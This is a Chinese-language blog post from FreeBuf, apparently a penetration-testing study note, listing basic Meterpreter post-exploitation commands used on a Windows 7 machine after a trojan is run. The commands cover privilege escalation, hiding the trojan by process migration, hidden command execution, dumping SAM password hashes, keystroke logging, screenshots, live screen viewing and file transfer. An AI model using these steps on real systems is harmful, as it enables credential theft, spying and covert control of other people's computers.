freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day4-meterpreter基本命令
2020-11-16 13:16:14

meterpreter基本命令

1.getuid 查看当前用户

wps43

2.getpid 查看当前的进程id

wps44

3.getsystem 初步提权

wps45

注意:这边是在win7使用管理员身份运行木马了,不然一般是不成功的。

4.ps 1.查看进程列表2.帮助我们获取pid进行进程迁移

wps46

5.migrate 7624 迁移  将木马进程注入系统进程中

wps47

这时候在输入ps查看就找不到4092进程了

6.shell 进入cmd环境(碰到乱码:chcp 65001 (utf-8))

wps48

7.execute 执行命令(常用execute -H -c -i -f cmd)

wps49

-H创建隐藏的进程

-c 信道化I/O(交互所需)

-i 创建流程后与之交互

-f 要运行的可执行命令

8.bg 返回控制台

wps50

9.sessions 查看会话

wps51

10.sessions -i id 进入会话

wps52

11.sessions -k id | sessions -K  指定删除会话|删除全部会话

wps53

wps54

12.jobs 查看工作

wps55

13.run -j | exploit -j 后台监听

wps56

win7点击木马文件后会话才会产生

wps57

14.run -z | exploit -z 持续监听

wps58

wps59

15.hashdump 下载sam表中的账户密码信息(需要管理员权限)

wps60

16.捕获键盘按击

keyscan_dump   Dump the keystroke buffer

keyscan_start  Start capturing keystrokes

keyscan_stop   Stop capturing keystrokes

wps61

17screenshot 截屏

wps62

wps63

18.run vnc | screenshare   实时查看对方电脑屏幕

wps64wps65

19.pwd 当前目录位置

wps66

20.download 从远程主机中下载文件

wps67wps68wps69

21.upload 从远程主机中上传文件

wps70

wps71wps72

# 内网渗透
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者